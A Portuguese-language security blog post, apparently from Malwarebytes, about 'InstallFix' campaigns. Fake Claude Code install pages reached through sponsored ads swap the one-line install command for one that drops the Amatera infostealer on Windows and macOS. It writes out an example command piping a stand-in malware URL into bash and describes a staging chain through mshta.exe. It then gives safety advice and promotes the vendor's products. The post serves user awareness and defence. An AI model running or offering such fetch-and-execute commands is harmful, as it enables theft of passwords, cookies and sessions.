Os invasores estão clonando páginas de instalação de ferramentas populares como o Claude Code e trocando os comandos de instalação “one-liner” por malware, principalmente para roubar senhas, cookies, sessões e acesso a ambientes de desenvolvedores.
Os guias de instalação modernos geralmente dizem para você copiar um único comando como curl https://malware-site | bash em seu terminal e pressione Enter. Esse hábito transforma o site em um controle remoto: qualquer script que esteja naquele URL é executado com suas permissões, geralmente as de um administrador.
Pesquisadores descobriram que os invasores abusam desse fluxo de trabalho, mantendo tudo idêntico, alterando apenas o local ao qual essa linha única realmente se conecta. Para muitos usuários não especializados que acabaram de começar a usar ferramentas de IA e de desenvolvedor, esse método parece normal, então eles estão com a guarda baixa.
Mas isso basicamente se resume a “Eu confio neste domínio” e isso não é uma boa ideia, a menos que você tenha certeza de que ele é confiável.
Geralmente acontece assim. Alguém pesquisa “Claude Code install” ou “Claude Code CLI”, vê um resultado patrocinado no topo com um URL plausível e clica sem pensar muito sobre isso.
Mas esse anúncio leva a uma documentação clonada ou página de download: mesmo logotipo, mesma barra lateral, mesmo texto e um botão familiar “copiar” próximo ao comando de instalação. Em muitos casos, qualquer outro link em que você clicar nessa página falsa o redireciona silenciosamente para o site do fornecedor real, para que nada mais pareça suspeito.
Semelhante aos ataques ClickFix, este método é chamado Instalar Correção. O usuário executa o código que infecta sua própria máquina, sob falsos pretextos, e a carga geralmente é um infostealer.
A principal carga nesses casos de InstallFix com tema Claude Code é um infostealer chamado Amatera. Ele se concentra nos dados do navegador, como senhas salvas, cookies, tokens de sessão, dados de preenchimento automático e informações gerais do sistema que ajudam os invasores a criar o perfil do dispositivo. Com isso, eles podem sequestrar sessões da web e fazer login em painéis de nuvem e painéis internos de administrador sem precisar da sua senha real. Alguns relatórios também mencionam o interesse em carteiras criptografadas e outras contas de alto valor.
Windows e Mac
A campanha baseada no Código Claude que os pesquisadores descobriram estava equipada para atingir usuários de Windows e Mac.
No macOS, o one-liner malicioso geralmente extrai um script de segundo estágio de um domínio controlado pelo invasor, muitas vezes ofuscado com base64 para parecer barulhento, mas inofensivo à primeira vista. Esse script baixa e executa um binário de outro domínio, eliminando atributos e tornando-o executável antes de iniciá-lo.
No Windows, o comando foi visto gerando cmd.exeque então chama mshta.exe com um URL remoto. Isso permite que a lógica do malware seja executada como um binário confiável da Microsoft, em vez de um executável aleatório óbvio. Em ambos os casos, nada de espetacular aparece na tela: você pensa que acabou de instalar uma ferramenta, enquanto a carga real começa silenciosamente a fazer seu trabalho em segundo plano.
Como se manter seguro
Com ClickFix e InstallFix em alta velocidade – e não parece que irão desaparecer tão cedo – é importante estar atento, cuidadoso e protegido.
- Desacelerar. Não se apresse em seguir as instruções em uma página da web ou prompt, especialmente se ele solicitar que você execute comandos em seu dispositivo ou copie e cole código. Analise o que o comando fará antes de executá-lo.
- Evite executar comandos ou scripts de fontes não confiáveis. Nunca execute códigos ou comandos copiados de sites, e-mails ou mensagens, a menos que você confie na fonte e entenda o propósito da ação. Verifique as instruções de forma independente. Se um site solicitar que você execute um comando ou uma ação técnica, verifique a documentação oficial ou entre em contato com o suporte antes de continuar.
- Limite o uso de copiar e colar para comandos. Digitar comandos manualmente em vez de copiar e colar pode reduzir o risco de execução inadvertida de cargas maliciosas ocultas no texto copiado.
- Proteja seus dispositivos. Use uma solução antimalware atualizada e em tempo real com um componente de proteção da web.
- Eduque-se sobre a evolução das técnicas de ataque. Compreender que os ataques podem vir de vetores inesperados e evoluir ajuda a manter a vigilância. Continue lendo nosso blog!
Para uma dica: Você sabia que a extensão gratuita Malwarebytes Browser Guard avisa quando um site tenta copiar algo para sua área de transferência?
Não apenas informamos ameaças: nós as removemos
Os riscos de cibersegurança nunca devem ultrapassar as manchetes. Mantenha as ameaças longe dos seus dispositivos baixando o Malwarebytes hoje mesmo.
Deseja saber mais sobre Segurança Digital & Antivírus Clique Aqui!
Amatera,Claude Code,ladrão de informações,INstallFix